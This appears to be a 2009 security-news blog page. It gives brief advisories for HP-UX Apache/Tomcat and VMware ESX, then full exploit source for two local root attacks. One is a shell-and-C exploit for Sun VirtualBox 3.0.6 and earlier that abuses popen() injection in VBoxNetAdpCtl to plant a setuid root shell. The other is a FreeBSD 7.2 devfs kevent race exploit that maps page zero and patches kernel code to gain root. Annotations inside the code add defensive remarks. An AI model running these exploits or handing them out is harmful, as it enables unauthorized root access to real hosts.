
HP-UX On Tomcat Servlet Engine, Remote Denial of Service (DoS), Unauthorized Access

Saturday, October 24th, 2009

HP-UX On Tomcat Servlet Engine, Remote Denial of Service (DoS), Unauthorized Access
Potential security vulnerabilities have been identified with HP-UX running Tomcat-based Servlet Engine. The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS) or unauthorized access. Tomcat-based Servlet Engine is contained in the Apache Web Server Suite.

Affected Versions:
HP-UX B.11.23, B.11.31 running Apache-based Web Server versions before v2.2.8.05
HP-UX B.11.11, B.11.23, B.11.31 running Apache-based Web Server versions before v2.0.59.12

Updates:
HP has provided the following upgrades to resolve these vulnerabilities. The upgrades are available from the following location:
http://software.hp.com

References:
Hewlett-Packard Company, HP Software Security Response Team

HP-UX On Apache-based Web Server, Remote Denial of Service (DoS) & Cross-Site Scripting (XSS) Unauthorized Access

Saturday, October 24th, 2009

Remote Denial of Service (DoS), cross-site scripting (XSS), unauthorized access

Potential security vulnerabilities have been identified with HP-UX running Apache-based Web Server. The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS), cross-site scripting (XSS) or unauthorized access. Apache-based Web Server is contained in the Apache Web Server Suite.

Affected Versions:
HP-UX B.11.23, B.11.31 running Apache-based Web Server versions before v2.2.8.05
HP-UX B.11.11, B.11.23, B.11.31 running Apache-based Web Server versions before v2.0.59.12

Updates are available:
http://software.hp.com

References:
SUPPORT COMMUNICATION – SECURITY BULLETIN from HP (HP Unix)

VMware multiple security issues and advisories

Sunday, October 18th, 2009

VMware multiple security issues and advisories
VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues.

Summary:
Updated DHCP and Kernel packages for ESX 3.5 and ESX 3.0.3 and updated Java JRE packages for ESX 3.5 address several security issues.

Service Console update for DHCP and third party library update for DHCP client.
A stack-based buffer overflow in the script_write_params method in ISC DHCP dhclient allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option.
An insecure temporary file use flaw was discovered in the DHCP daemon’s init script (“/etc/init.d/dhcpd”). A local attacker could use this flaw to overwrite an arbitrary file with the output of the “dhcpd -t” command via a symbolic link attack, if a system administrator executed the DHCP init script with the “configtest”, “restart”, or “reload” option.

Updated Service Console package kernel
Service Console package kernel update to version kernel-2.4.21-58.EL.

JRE Security Update
JRE update to version 1.5.0_18, which addresses multiple security issues that existed in earlier releases of JRE.
Notes: These vulnerabilities can be exploited remotely only if the attacker has access to the Service Console network.

References:
The Common Vulnerabilities and Exposures project
VMware Lists

Sun VirtualBox <= 3.0.6 Local Root Exploit & VBoxNetAdpCtl Privilege Escalation

Sunday, October 18th, 2009

Sun VirtualBox <= 3.0.6 Local Root Exploit
Exploits popen() meta char shell injection vulnerability in Sun VirtualBox.

#!/bin/sh
# admin@sundevil:~/test$ id
# uid=101(admin) gid=10(staff) groups=10(staff)
# admin@sundevil:~/test$ uname -a
# SunOS sundevil 5.11 snv_111b i86pc i386 i86pc Solaris
# admin@sundevil:~/test$ ./prdelka-vs-SUN-virtualbox.sh 
# [ Sun VirtualBox <= 3.0.6 OSX/SOL/LINUX local root exploit
# [ No path provided, will attempt to exploit system default
# [ Places a root shell in ./sh if succesful
# [ Detected a SunOS target
# [ Detected SunOS is x86 platform
# ifconfig: add: bad address
# [ Trying for root shell.
# # id
# uid=101(admin) gid=10(staff) euid=0(root) egid=0(root) groups=10(staff)
#
# -- prdelka 
cat >> runme.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
 
/* Payload that the VBoxNetAdpCtl injection (the "vboxnet0|./runme" argument
 * built into exploit.c below) gets executed with the helper's privileges.
 * It copies /bin/sh byte-by-byte to ./sh and marks the copy setuid/setgid
 * root. argc/argv are unused; the process always terminates via exit(0).
 *
 * No return value of fopen(), open(), fchown() or fchmod() is checked, so on
 * failure ./sh is simply missing, empty, or left without the setuid bits.
 *
 * Defender's view: a root-owned, setuid copy of /bin/sh appearing in a user's
 * working directory is a high-confidence indicator of this class of
 * privilege escalation; mounting user-writable filesystems nosuid keeps the
 * copy from granting privileges even when the injection itself succeeds. */
int main(int argc, char* argv[]){
	FILE *from, *to;
	int fd;
	char ch;
	/* setuid(0)/setgid(0) only succeed if the caller already runs with root
	 * privileges (presumably inherited from the setuid helper). */
	setuid(0);
	setgid(0);
	from = fopen("/bin/sh","rb");
	to = fopen("./sh","wb");
	/* feof() is re-checked after fgetc() so the EOF sentinel returned by the
	 * final read is not written into ./sh. */
	while(!feof(from)){
		ch = fgetc(from);
		if(!feof(from))
			fputc(ch, to);
	}
	fclose(from);
	fclose(to);
	/* Re-open the copy and, through the descriptor, set owner root:root plus
	 * rwx for everyone, setuid and setgid. */
	fd = open("./sh",O_RDWR);
	fchown(fd,0,0);
	fchmod(fd,S_IRWXU|S_IRWXG|S_IRWXO|S_ISUID|S_ISGID);
	close(fd);	
	exit(0);
}
EOF
gcc runme.c -o runme 2>/dev/null
rm -rf runme.c
cat >> exploit.c << EOF
./sh

VirtualBox VBoxNetAdpCtl Privilege Escalation
Local exploit for the popen() meta-character shell injection vulnerability that permits a malicious user to obtain root privileges on the VirtualBox host machine. This exploit relies on the “/bin/sh” binary on the host being a non-privilege-dropping shell such as zsh; this is not always the OS default setting.

#!/bin/sh
#include <stdio.h>
#include <stdlib.h>
#include <sys/utsname.h>
 
/* Launcher for the VBoxNetAdpCtl popen() injection described above.
 * Every path hands the helper the adapter-name argument "vboxnet0|./runme";
 * the page describes the flaw as popen() meta-character injection, so the
 * '|' presumably makes the shell run ./runme (built from runme.c above) with
 * the helper's privileges. If execle() succeeds this program is replaced
 * and never returns; otherwise it falls through to exit(0).
 *
 * argv[1], when given, is used as the helper path verbatim; otherwise the
 * platform is chosen from uname() and a per-OS default path is tried.
 *
 * NOTE(review): 'platform' is only assigned when sysname matches Darwin,
 * SunOS or Linux; on any other system the switch reads it uninitialized.
 * 'machine' is set but never read, and strncmp()/strlen() are used without
 * including <string.h>.
 *
 * Defender's view: the root cause is a privileged helper passing
 * caller-controlled text through popen(); the fix belongs in the helper
 * (validate the interface name, or avoid the shell and exec with an explicit
 * argv). The page lists the affected versions as <= 3.0.6. */
int main(int argc,char* argv[])
{
        /* Empty environment for the helper: nothing from the caller's
         * environment is passed along. */
        char *env[] = {NULL};
	int platform, machine = 0;
	struct utsname* sysdetail = malloc(sizeof(struct utsname));
	printf("[ Sun VirtualBox <= 3.0.6 OSX/SOL/LINUX local root exploit\n");
	if(argc > 1){
		printf("[ Trying %s\n", argv[1]);
		execle(argv[1],argv[1],"vboxnet0|./runme","1::2",NULL,env);
		exit(0);
	}
	else{
		printf("[ No path provided, will attempt to exploit system default\n");
	}
 	printf("[ Places a root shell in ./sh if succesful\n");
	/* Classify the host by uname() sysname prefix:
	 * 1 = Darwin, 2 = SunOS, 3 = Linux. */
	uname(sysdetail);
	if(!strncmp("Darwin",sysdetail->sysname,strlen("Darwin")))
		platform = 1;
	if(!strncmp("SunOS",sysdetail->sysname,strlen("SunOS"))) 
		platform = 2; 
	if(!strncmp("Linux",sysdetail->sysname,strlen("Linux"))) 
		platform = 3;
	switch(platform){
		case 1:
			printf("[ Detected a Mac OS X target\n");
			execle("/Applications/VirtualBox.app/Contents/MacOS/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			break;
		case 2:
			printf("[ Detected a SunOS target\n");
			/* "i86pc" selects the i386 helper; any other machine string is
			 * assumed to be amd64. */
			if(!strncmp("i86pc",sysdetail->machine,strlen("i86pc"))){
				printf("[ Detected SunOS is x86 platform\n");
				execle("/opt/VirtualBox/i386/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			}
			else{
				printf("[ Guessing SunOS is amd64 platform\n");
				execle("/opt/VirtualBox/amd64/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			}
			break;
		case 3:
			printf("[ Detected a Linux target\n");
			execle("/opt/VirtualBox/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			break;
		default:
			printf("[ Unknown OSE target. Try ./%s <path>/VBoxNetAdpCtl\n",argv[0]);
			break;
	}
        exit(0);
}
EOF
# Compile the launcher written by the preceding heredoc, then delete its source.
gcc exploit.c -o exploit 2>/dev/null
rm -rf exploit.c
# Pass an optional VBoxNetAdpCtl path through to the launcher.
# NOTE(review): $1 is unquoted, so an argument containing spaces misparses
# both the test and the invocation.
if [ $1 ]
then
        ./exploit $1
else
        ./exploit
fi
# ./sh is the setuid copy of /bin/sh that runme creates when the injection
# succeeded; when it did not, this simply fails to start.
echo [ Trying for root shell.
./sh

FreeBSD 7.2 => VFS and devfs code Race Condition Vulnerability

Friday, October 9th, 2009

FreeBSD 7.2 => VFS and devfs code Race Condition Vulnerability

FreeBSD 7.2 and below (including 6.4) are vulnerable to a race condition in the VFS and devfs code, resulting in a NULL pointer dereference. In contrast to the pipe race condition, this vulnerability is actually much harder to exploit.

An si_threadcount incrementation is used to modify kernel code in devfs_fp_check(). The opcode at 0xc076c64b is “je” (0x74). After incrementation it changes to 0x75, which is “jne”. Such a modification results in dev_relthread() not being called and eventually leads to a function pointer call in devfs_kqfilter_f().

Note: On default 7.2 kernel

/* 14.09.2009, babcia padlina 
 * FreeBSD 7.2 devfs kevent() race condition exploit
 *
 * works only on multiprocessor systems
 * compile with -lpthread
 */
 
#define JE_ADDRESS 0xc076c62b
 
/* location of "je" (0x74) opcode in devfs_fp_check() - it will be incremented
 * becoming "jne" (0x75), so error won't be returned in devfs_vnops.c:648
 * and junk function pointer will be called in devfs_vnops.c:650
 * 
 * you can obtain it using:
 * $ objdump -d /boot/kernel/kernel | grep -A 50 \<devfs_fp_check\>: | grep je | head -n 1 | cut -d: -f1
 */
 
#include <pthread.h>
 
#define _KERNEL
 
#include <sys/param.h>
#include <sys/conf.h>
#include <sys/ucred.h>
#include <fs/devfs/devfs_int.h>
 
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/event.h>
#include <sys/timespec.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/proc.h>
 
/* State shared between main() and the two racing threads. None of it is
 * protected by a lock: 'fd' is rewritten by do_thread2() while do_thread()
 * reads it, and 'gotroot' is a plain volatile int rather than an atomic. */
int fd, kq;                  /* fd: devfs node reopened in a loop; kq: kqueue used for kevent() */
struct kevent kev, ke;       /* change list / event list handed to kevent() */
struct timespec timeout;     /* kevent() timeout, set to 1 ns in main() */
volatile int gotroot = 0;    /* set to 1 by kernel_code(); polled by both threads and main() */
 
/* Payload run in kernel context once the corrupted function pointer is
 * followed (main() fills the page at 0x37e3000 with this function's address).
 * It flags success and then rewrites the calling process's credentials:
 * uid 0 and no prison (jail). It is compiled into the user-space binary, so
 * presumably it only runs because the kernel can execute user-mapped pages
 * on the affected release. */
static void kernel_code(void) {
	struct thread *thread;
	gotroot = 1;
	/* Load the current thread pointer from %fs:0 — looks like the i386
	 * per-CPU curthread slot (consistent with the 32-bit addresses used
	 * throughout); confirm for the target kernel. */
	asm(
		"movl %%fs:0, %0"
		: "=r"(thread)
	);
	thread->td_proc->p_ucred->cr_uid = 0;
	thread->td_proc->p_ucred->cr_prison = NULL;
 
	return;
}
 
/* Empty marker placed directly after kernel_code(); nothing in this listing
 * references it (presumably left over from a payload-size computation). */
static void code_end(void) {
	return;
}
 
/* First racing thread: after a short delay, keeps registering the global
 * 'fd' with the kqueue until kernel_code() sets gotroot. Because
 * do_thread2() is concurrently closing and reopening that descriptor, some
 * kevent() calls presumably reach the devfs vnode while its device state is
 * being torn down — the VFS/devfs race the page describes. A failing call is
 * only reported with perror(); the loop continues regardless.
 *
 * NOTE(review): declared void(void) but handed to pthread_create() through a
 * (void *) cast in main(); the start-routine type does not match. */
void do_thread(void) {
	usleep(100);
 
	while (!gotroot) {
		memset(&kev, 0, sizeof(kev));
		EV_SET(&kev, fd, EVFILT_READ, EV_ADD, 0, 0, NULL);
 
		if (kevent(kq, &kev, 1, &ke, 1, &timeout) < 0)
			perror("kevent");
 
	}
 
	return;
}
 
/* Second racing thread: opens and immediately closes a devfs node in a tight
 * loop until gotroot is set, so that the global 'fd' read by do_thread()
 * alternates between a live and a stale descriptor. The mode argument
 * (0600) has no effect when the node already exists. */
void do_thread2(void) {
	while(!gotroot) {
		/* any devfs node will work */
		if ((fd = open("/dev/null", O_RDONLY, 0600)) < 0)
			perror("open");
 
		close(fd);
	}
 
	return;
}
 
/* Prepares the user-space memory the kernel will be tricked into reading,
 * starts the two racing threads, and waits up to ~1 s for kernel_code() to
 * set gotroot. Returns -1 (exit status 255) on any setup failure or if the
 * race never fires; on success it exec()s a shell and does not return.
 *
 * Relies on the fixed-address layout described in the comments below and on
 * JE_ADDRESS matching the running kernel (see the objdump recipe in the file
 * header). NOTE(review): the article text above quotes the je opcode at
 * 0xc076c64b while JE_ADDRESS in this listing is 0xc076c62b — confirm which
 * value is intended for the target kernel.
 *
 * Defender's view: every step depends on an unprivileged process mapping
 * page zero (MAP_FIXED at 0x0) so that a kernel NULL-pointer dereference
 * reads attacker-controlled data; refusing such mappings (the
 * security.bsd.map_at_zero sysctl in later FreeBSD releases) or applying the
 * devfs fix closes the path. The "failed - system patched or not MP" message
 * is the expected outcome on a fixed system. */
int main(void) {
	int i;
	pthread_t pth, pth2;
	struct cdev devp;	/* never initialized; only its field offset is used below */
	char *p;
	unsigned long *ap;
 
	/* 0x1c used for vp->v_rdev dereference, when vp=0 */
	/* 0xa5610e8 used for vp->r_dev->si_priv dereference */
	/* 0x37e3e1c is junk dsw->d_kqfilter() in devfs_vnops.c:650 */
 
	unsigned long pages[] = { 0x0, 0xa561000, 0x37e3000 };
	unsigned long sizes[] = { 0xf000, 0x1000, 0x1000 }; 
 
	/* Map each region anonymously at its fixed address with RWX permissions.
	 * The first covers the NULL page, so a kernel dereference through a zero
	 * vnode pointer lands in memory this process controls.
	 * NOTE(review): "%p" with unsigned long arguments is a format mismatch. */
	for (i = 0; i < sizeof(pages) / sizeof(unsigned long); i++) {
		printf("[*] allocating %p @ %p\n", sizes[i], pages[i]);
		if (mmap((void *)pages[i], sizes[i], PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) == MAP_FAILED) {
			perror("mmap");
			return -1;
		}
	}
 
	/* Plant a fake cdev pointer at offset 0x1c of the NULL page, chosen so
	 * that the kernel's increment of cdev->si_threadcount hits the byte at
	 * JE_ADDRESS instead, turning "je" into "jne" as the header comment
	 * explains. The field offset is computed from the local devp. */
	*(unsigned long *)0x1c = (unsigned long)(JE_ADDRESS - ((char *)&devp.si_threadcount - (char *)&devp));
 
	/* Fill the third page with kernel_code()'s address, one 4-byte word at a
	 * time, so whichever word the junk d_kqfilter lookup reads calls the
	 * payload. */
	p = (char *)pages[2];
	ap = (unsigned long *)p;
 
	for (i = 0; i < sizes[2] / 4; i++)
		*ap++ = (unsigned long)&kernel_code;
 
	if ((kq = kqueue()) < 0) {
		perror("kqueue");
		return -1;
	}
 
	/* Start both halves of the race; the casts paper over the fact that the
	 * thread functions are not declared with the pthread start-routine type. */
	pthread_create(&pth, NULL, (void *)do_thread, NULL);
	pthread_create(&pth2, NULL, (void *)do_thread2, NULL);
 
	/* 1 ns kevent() timeout, set after the threads are already running (the
	 * first kevent() calls may therefore see it zeroed). */
	timeout.tv_sec = 0;
	timeout.tv_nsec = 1;
 
	printf("waiting for root...\n");
	i = 0;
 
	/* Poll for at most 10000 x 100 us (~1 s of sleeping). */
	while (!gotroot && i++ < 10000)
		usleep(100);
 
	/* Presumably kernel_code() has already changed the credential's uid;
	 * setuid(0) then propagates it so getuid() reports 0 — confirm against
	 * the ucred layout of the target kernel. If the payload never ran,
	 * setuid(0) fails and getuid() stays nonzero. */
	setuid(0);
 
	if (getuid()) {
		printf("failed - system patched or not MP\n");
		return -1;
	}
 
	execl("/bin/sh", "sh", NULL);
 
	return 0;
}